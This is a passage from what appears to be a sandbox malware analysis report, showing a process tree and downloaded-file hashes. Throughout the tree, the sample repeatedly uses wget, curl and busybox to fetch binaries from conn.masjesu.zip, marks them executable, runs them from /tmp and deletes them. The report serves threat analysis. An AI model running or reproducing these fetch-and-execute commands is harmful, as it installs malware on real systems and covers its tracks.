                                                                                        chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                                                                                        2⤵
                                                                                        • File and Directory Permissions Modification
                                                                                        PID:979
                                                                                      • /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                                                                                        ./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:980
                                                                                      • /bin/rm
                                                                                        rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                                                                                        2⤵
                                                                                          PID:981
                                                                                        • /usr/bin/wget
                                                                                          wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                                                                          2⤵
                                                                                          • System Network Configuration Discovery
                                                                                          PID:982
                                                                                        • /usr/bin/curl
                                                                                          curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                                                                          2⤵
                                                                                          • Reads runtime system information
                                                                                          • System Network Configuration Discovery
                                                                                          • Writes file to tmp directory
                                                                                          PID:983
                                                                                        • /bin/busybox
                                                                                          /bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                                                                          2⤵
                                                                                            PID:985
                                                                                          • /bin/chmod
                                                                                            chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                                                                            2⤵
                                                                                            • File and Directory Permissions Modification
                                                                                            PID:986
                                                                                          • /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                                                                            ./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:987
                                                                                          • /bin/rm
                                                                                            rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                                                                            2⤵
                                                                                              PID:988
                                                                                            • /usr/bin/wget
                                                                                              wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                                                                              2⤵
                                                                                              • System Network Configuration Discovery
                                                                                              PID:989
                                                                                            • /usr/bin/curl
                                                                                              curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                                                                              2⤵
                                                                                              • Reads runtime system information
                                                                                              • System Network Configuration Discovery
                                                                                              • Writes file to tmp directory
                                                                                              PID:990
                                                                                            • /bin/busybox
                                                                                              /bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                                                                              2⤵
                                                                                              • System Network Configuration Discovery
                                                                                              PID:992
                                                                                            • /bin/chmod
                                                                                              chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                                                                              2⤵
                                                                                              • File and Directory Permissions Modification
                                                                                              PID:993
                                                                                            • /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                                                                              ./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:994
                                                                                            • /bin/rm
                                                                                              rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                                                                              2⤵
                                                                                                PID:995
                                                                                              • /usr/bin/wget
                                                                                                wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                                                                                2⤵
                                                                                                • System Network Configuration Discovery
                                                                                                PID:996
                                                                                              • /usr/bin/curl
                                                                                                curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                                                                                2⤵
                                                                                                • Reads runtime system information
                                                                                                • System Network Configuration Discovery
                                                                                                • Writes file to tmp directory
                                                                                                PID:997
                                                                                              • /bin/busybox
                                                                                                /bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                                                                                2⤵
                                                                                                • System Network Configuration Discovery
                                                                                                PID:999
                                                                                              • /bin/chmod
                                                                                                chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                                                                                2⤵
                                                                                                • File and Directory Permissions Modification
                                                                                                PID:1000
                                                                                              • /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                                                                                ./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1001
                                                                                              • /bin/rm
                                                                                                rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                                                                                2⤵
                                                                                                  PID:1002
                                                                                                • /usr/bin/wget
                                                                                                  wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                                                                                  2⤵
                                                                                                  • System Network Configuration Discovery
                                                                                                  PID:1003
                                                                                                • /usr/bin/curl
                                                                                                  curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                                                                                  2⤵
                                                                                                  • Reads runtime system information
                                                                                                  • System Network Configuration Discovery
                                                                                                  • Writes file to tmp directory
                                                                                                  PID:1004
                                                                                                • /bin/busybox
                                                                                                  /bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                                                                                  2⤵
                                                                                                  • System Network Configuration Discovery
                                                                                                  PID:1006
                                                                                                • /bin/chmod
                                                                                                  chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                                                                                  2⤵
                                                                                                  • File and Directory Permissions Modification
                                                                                                  PID:1007
                                                                                                • /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                                                                                  ./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:1008
                                                                                                • /bin/rm
                                                                                                  rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                                                                                  2⤵
                                                                                                    PID:1009

                                                                                                Network

                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

                                                                                                  Filesize

                                                                                                  153B

                                                                                                  MD5

                                                                                                  998368d7c95ea4293237f2320546e440

                                                                                                  SHA1

                                                                                                  30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

                                                                                                  SHA256

                                                                                                  533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

                                                                                                  SHA512

                                                                                                  648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97